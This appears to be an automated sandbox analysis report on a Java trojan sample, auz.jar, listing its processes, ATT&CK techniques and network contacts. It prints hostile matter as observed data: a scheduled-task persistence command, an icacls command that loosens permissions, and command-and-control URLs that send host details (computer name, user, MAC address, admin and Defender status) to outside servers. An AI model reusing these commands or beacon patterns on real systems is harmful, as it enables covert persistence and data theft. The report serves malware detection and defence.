Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1792:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Roaming\bcfca1Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeSection loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dllJump to behavior
Source: java.exeString found in binary or memory: bLjava/lang/Enum<Lsun/launcher/LauncherHelper;>;
Source: java.exeString found in binary or memory: PLsun/launcher/LauncherHelper;
Source: java.exeString found in binary or memory: ()[Lsun/launcher/LauncherHelper;'
Source: java.exeString found in binary or memory: B(Ljava/lang/String;)Lsun/launcher/LauncherHelper;
Source: java.exeString found in binary or memory: t(Ljava/util/List<Lsun/launcher/LauncherHelper$StdArg;>;)[Ljava/lang/String;
Source: java.exeString found in binary or memory: sun/launcher/
Source: java.exeString found in binary or memory: Q*xsun/launcher/LauncherHelper$ResourceBundleHolder&
Source: java.exeString found in binary or memory: Vsun/launcher/LauncherHelper$FXHelper
Source: java.exeString found in binary or memory: -sun/launcher/LauncherHelper$StdArg
Source: java.exeString found in binary or memory: S"sun/launcher/LauncherHelper$SizePrefix
Source: java.exeString found in binary or memory: Lfsun/launcher/LauncherHelperass
Source: java.exeString found in binary or memory: [Lsun/launcher/LauncherHelper;
Source: javaw.exeString found in binary or memory: 2-startHandshake
Source: javaw.exeString found in binary or memory: !3.in-addr.arpa
Source: classification engineClassification label: mal60.expl.winJAR@30/3@10/2
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: tasklist.exe, 00000005.00000003.310378007.000000000099A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000005.00000003.310304891.000000000098A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process;
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_3_1560EC71 push edi; iretd 2_3_1560EC72
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_3_1560DE47 push ecx; iretd 2_3_1560DE4E
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_3_1560C42A push eax; ret 2_3_1560C459
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_3_15609DBD push ebx; iretd 2_3_15609DBE
Source: Java tracingExecutes: java.lang.ProcessBuilder(java.lang.String[]) on cmd /c schtasks /create /tn "javaconnect" /tr "\"c:\program files (x86)\java\jre1.8.0_211\bin\javaw.exe\" -jar \"c:\users\user\appdata\roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60

Persistence and Installation Behavior

barindex
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: reg.exe
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: reg.exe
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: reg.exeJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: reg.exeJump to behavior

Boot Survival

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: javaw.exe, 0000000A.00000003.314691660.00000000156F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 0000000A.00000003.314691660.00000000156F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000002.00000002.564701846.0000000002E40000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.564706543.00000000030C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,java/lang/VirtualMachineError
Source: java.exe, 00000002.00000002.564701846.0000000002E40000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.564706543.00000000030C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |[Ljava/lang/VirtualMachineError;
Source: java.exe, 00000002.00000003.301187401.00000000154F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: java.exe, 00000002.00000003.301187401.00000000154F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
Source: java.exe, 00000002.00000002.573635192.0000000015C32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMCipher.AES_192/CFB/NoPadding
Source: java.exe, 00000002.00000002.564515550.000000000145B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeMemory protected: page read and write | page guardJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\auz.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeQueries volume information: C:\Users\user\Desktop\auz.jar VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeQueries volume information: C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeQueries volume information: C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation
1
Scheduled Task/Job
11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts12
Command and Scripting Interpreter
1
Services File Permissions Weakness
1
Scheduled Task/Job
1
Modify Registry
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Scheduled Task/Job
Logon Script (Windows)1
Services File Permissions Weakness
1
Disable or Modify Tools
Security Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Exploitation for Client Execution
Logon Script (Mac)Logon Script (Mac)11
Process Injection
NTDS13
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Services File Permissions Weakness
Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 841597 Sample: auz.jar Startdate: 05/04/2023 Architecture: WINDOWS Score: 60 69 Multi AV Scanner detection for submitted file 2->69 71 Uses cmd line tools excessively to alter registry or file data 2->71 73 Exploit detected, runtime environment starts unknown processes 2->73 8 cmd.exe 2 2->8         started        11 javaw.exe 10 2->11         started        process3 dnsIp4 75 Uses schtasks.exe or at.exe to add and modify task schedules 8->75 14 java.exe 25 8->14         started        19 conhost.exe 8->19         started        55 www.paradisodomenico.it 11->55 57 www.geoplugin.net 11->57 59 3 other IPs or domains 11->59 77 Uses cmd line tools excessively to alter registry or file data 11->77 21 cmd.exe 1 11->21         started        23 tasklist.exe 1 11->23         started        25 reg.exe 1 11->25         started        signatures5 process6 dnsIp7 61 paradisodomenico.it 46.16.95.61, 443, 49698, 49699 SERVERPLAN-ASIT Italy 14->61 63 geoplugin.net 178.237.33.50, 49696, 49697, 80 ATOM86-ASATOM86NL Netherlands 14->63 65 3 other IPs or domains 14->65 53 C:\...\bcfca15a1fe879c681f1459b1b147c6e.log, Zip 14->53 dropped 67 Uses cmd line tools excessively to alter registry or file data 14->67 27 cmd.exe 1 14->27         started        29 tasklist.exe 1 14->29         started        31 reg.exe 1 14->31         started        33 icacls.exe 1 14->33         started        35 conhost.exe 21->35         started        37 schtasks.exe 1 21->37         started        39 conhost.exe 23->39         started        41 conhost.exe 25->41         started        file8 signatures9 process10 process11 43 conhost.exe 27->43         started        45 schtasks.exe 1 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
auz.jar11%ReversingLabsByteCode-JAVA.Trojan.Generic
auz.jar16%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
geoplugin.net0%VirustotalBrowse
adrenalinecyber.com0%VirustotalBrowse
www.geoplugin.net0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
http://www.chambersign.org10%URL Reputationsafe
https://ocsp.quovadisoffshore.com0%URL Reputationsafe
http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0%URL Reputationsafe
https://ocsp.quovadisoffshore.com00%URL Reputationsafe
http://www.chambersign.org0%URL Reputationsafe
http://policy.camerfirma.com00%URL Reputationsafe
http://crl.xrampsecurity.com/XGCA.crl0%URL Reputationsafe
https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&computer_name=305090&user_name=user&mac=EC-F4-BB-EA-15-88&country_code=CH&is_admin=normal&Def=ON&hwid=bcfca15a1fe879c681f1459b1b147c6e0%Avira URL Cloudsafe
https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&computer_name=305090&user_name=user&mac=EC-F4-BB-EA-15-88&country_code=CH&is_admin=admin&Def=OFF&hwid=bcfca15a1fe879c681f1459b1b147c6e0%Avira URL Cloudsafe
http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&computer_name=305090&user0%Avira URL Cloudsafe
https://www.paradisodomenico.it/wp-content//api.php0%Avira URL Cloudsafe
http://bugreport.sun.com/bugreport/0%URL Reputationsafe
http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&0%Avira URL Cloudsafe
http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
http://www.quovadis.bm0%URL Reputationsafe
http://www.quovadis.bm00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl0%URL Reputationsafe
https://www.paradisodomenico.it/wp-content//api.php?0%Avira URL Cloudsafe
https://adrenalinecyber.com/login//api.php?action=get_anytask&ip=&computer_name=305090&user_name=jon0%Avira URL Cloudsafe
https://adrenalinecyber.com/login//api.php?action=get_anytask&ip=&0%Avira URL Cloudsafe
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crls0%Avira URL Cloudsafe
https://adrenalinecyber.com/login//api.php?0%Avira URL Cloudsafe
http://www.geoplugin.net/json.gp?ip=0%Avira URL Cloudsafe
http://www.geoplugin.net/json.gp0%Avira URL Cloudsafe
https://adrenalinecyber.com/login//api.php?action=getIpAddress0%Avira URL Cloudsafe
https://adrenalinecyber.com/login//api.php0%Avira URL Cloudsafe
https://adrenalinecyber.com0%Avira URL Cloudsafe
https://www.paradisodomenico.it/wp-content/0%Avira URL Cloudsafe
http://www.geoplugin.net/json.gp?ip=)0%Avira URL Cloudsafe
http://www.geoplugin.net/json.gp?0%Avira URL Cloudsafe
https://adrenalinecyber.com/login/0%Avira URL Cloudsafe
https://www.paradisodomenico.it0%Avira URL Cloudsafe
http://crl.u0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
geoplugin.net
178.237.33.50
truefalseunknown
paradisodomenico.it
46.16.95.61
truefalse
    unknown
    adrenalinecyber.com
    unknown
    unknownfalseunknown
    www.geoplugin.net
    unknown
    unknownfalseunknown
    www.paradisodomenico.it
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&computer_name=305090&user_name=user&mac=EC-F4-BB-EA-15-88&country_code=CH&is_admin=normal&Def=ON&hwid=bcfca15a1fe879c681f1459b1b147c6efalse
      • Avira URL Cloud: safe
      unknown
      http://www.geoplugin.net/json.gp?ip=false
      • Avira URL Cloud: safe
      unknown
      https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&computer_name=305090&user_name=user&mac=EC-F4-BB-EA-15-88&country_code=CH&is_admin=admin&Def=OFF&hwid=bcfca15a1fe879c681f1459b1b147c6efalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://crl.chambersign.org/chambersroot.crl0java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://adrenalinecyber.com/login//api.phpjava.exe, 00000002.00000002.565299658.0000000005218000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://cps.chambersign.org/cps/chambersroot.html0java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://www.chambersign.org1java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://repository.swisssign.com/0java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://policy.camerfirma.comjavaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://repository.swisssign.com/3java.exe, 00000002.00000002.565299658.0000000005483000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://ocsp.quovadisoffshore.comjavaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crl.securetrust.com/STCA.crl0java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.certplus.com/CRL/class3P.crl0java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.geoplugin.net/json.gpjavaw.exe, 0000000A.00000002.565143131.000000000548B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.000000000549D000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.certplus.com/CRL/class2.crl0java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://adrenalinecyber.comjava.exe, 00000002.00000002.565299658.0000000005218000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.0000000005433000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.quovadisglobal.com/cps0java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://adrenalinecyber.com/login//api.php?action=get_anytask&ip=&java.exe, 00000002.00000002.565299658.0000000005218000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crljavaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://adrenalinecyber.com/login//api.php?action=getIpAddressjavaw.exe, 0000000A.00000002.565143131.0000000005433000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://ocsp.quovadisoffshore.com0java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&computer_name=305090&userjavaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.paradisodomenico.it/wp-content//api.phpjava.exe, 00000002.00000002.565299658.00000000052A7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://repository.swisssign.com/javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.chambersign.orgjava.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://policy.camerfirma.com0java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://crl.xrampsecurity.com/XGCA.crljava.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://adrenalinecyber.com/login//api.php?java.exe, 00000002.00000002.565299658.0000000005218000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.certplus.com/CRL/class2.crljavaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://bugreport.sun.com/bugreport/java.exe, 00000002.00000002.568546871.000000000A5C5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.567221416.000000000A797000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&java.exe, 00000002.00000002.565299658.00000000052A7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://java.oracle.com/java.exe, 00000002.00000002.568546871.000000000A5D5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.567221416.000000000A7A0000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://null.oracle.com/java.exe, java.exe, 00000002.00000002.573635192.0000000015C32000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A77B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000003.396032507.000000001566E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000002.573350505.00000000156B1000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.315886300.00000000156D5000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.396582802.00000000156AA000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.315708884.0000000015652000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.315477724.0000000015607000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, javaw.exe, 0000000A.00000003.393245827.0000000015874000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.570339410.000000001587B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.567221416.000000000A843000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000003.393054543.000000001585C000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://adrenalinecyber.com/login//api.php?action=get_anytask&ip=&computer_name=305090&user_name=jonjavaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
